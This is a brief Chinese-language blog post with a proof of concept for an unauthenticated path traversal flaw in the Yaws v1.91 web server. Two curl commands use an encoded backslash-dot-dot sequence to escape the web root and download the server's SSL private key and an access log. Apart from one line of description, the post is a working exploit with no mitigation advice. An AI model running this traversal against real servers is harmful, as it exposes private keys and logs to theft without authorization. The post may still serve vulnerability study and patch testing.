AD

Yawsv1.91任意文件读取下载

      Yaws v1.91 (Yet Another Web Server)存在一个任意文件读取下载漏洞,攻击者无需登录授权,即可可以利用该漏洞读取或下载任意文件。

POC:
       利用“%5C..”即可染过目录限制,访问到其他目录
       curl http://127.0.0.1:8080/%5C../ssl/yaws-key.pem
       curl http://127.0.0.1:8080/%5C../logs/localhost.8080.access

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略